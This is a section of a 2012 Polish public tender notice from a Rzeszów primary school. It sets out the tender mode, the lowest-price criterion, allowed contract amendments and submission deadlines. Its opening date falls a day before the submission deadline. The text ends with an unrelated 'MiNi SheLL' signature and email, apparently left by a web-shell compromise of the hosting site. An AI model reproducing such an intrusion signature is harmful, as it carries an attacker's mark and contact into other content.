<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający, dla zapewnienia prawidłowej realizacji zadania, dopuszcza możliwość zmian postanowień zawartych w niniejszej umowie, w tym w szczególności dotyczy to przedmiotu zamówienia, terminu wykonania umowy, ustalonego wynagrodzenia, w następujących przypadkach:
a.Ograniczenia zakresu rzeczowego umowy,
b.Zmiany przepisów prawnych dotyczących przedmiotu umowy, jeżeli zmiana przepisów wymaga zmiany postanowień umowy,
c.Sytuacji niezależnych od stron umowy.
d.W przypadku działania siły wyższej, powodującej konieczność wprowadzenia zmian do umowy. Przez działanie siły wyższej należy rozumieć zdarzenie bądź połączenie zdarzeń obiektywnie niezależnych od stron umowy, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których strony umowy nie mogły przewidzieć i którym nie mogły zapobiec, ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych. Wykonawca jest zobowiązany niezwłocznie poinformować Zamawiającego o fakcie zaistnienia siły wyższej oraz wskazać zakres i wpływ jakie zdarzenie miało na przebieg realizacji przedmiotu umowy
e.Gdy potrzeba wprowadzenia zmian do umowy wynika ze zmian natury technicznej i prawnej.
2.Zamawiający ponadto dopuszcza możliwość zmiany terminu wykonania umowy w sytuacji, gdy:
a.Wystąpią przeszkody natury prawnej lub technicznej.
b.Wykonawca zakończy realizację przedmiotu umowy przed terminem
3.Zmiana ustalonego w umowie wynagrodzenia nastąpi, gdy zaistnieją zdarzenia objęte regulacją § 8 ust. 3 i § 15 umowy.
4.Zmiany umowy, o których mowa w ust. 1, 2 i 3 niniejszego paragrafu mogą być wprowadzone w następującym trybie:
a.W przypadku wystąpienia okoliczności, o których mowa w ust. 1, 2 i 3 Wykonawca zwróci się do Zamawiającego z wnioskiem o dokonanie zmiany umowy, zawierającym stosowne uzasadnienie. Wniosek winien być złożony w formie pisemnej przed wprowadzeniem zmian, niezwłocznie po ich wystąpieniu.
b.Zamawiający po zapoznaniu się z uzasadnieniem i przy uwzględnieniu okoliczności sprawy dokona oceny zasadności zmiany umowy. 
c.Wszelkie zmiany niniejszej umowy mogą być dokonywane na podstawie obustronnie uzgodnionych aneksów do Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp-25.rzeszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa nr 25 ,35-508  Rzeszów ul. Starzyńskiego 17   za odpłatnością 15 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2012 godzina 08:30, miejsce: Szkoła  Podstawowa nr 25  Rzeszów - ul. Starzyńskiego 17  (sekretariat szkoły ) parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający otworzy koperty z ofertami i zmianami w dniu 18.06.2012  r. o godz. 09:00 w Sali nr 17 ( parter) w siedzibie Zamawiającego ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com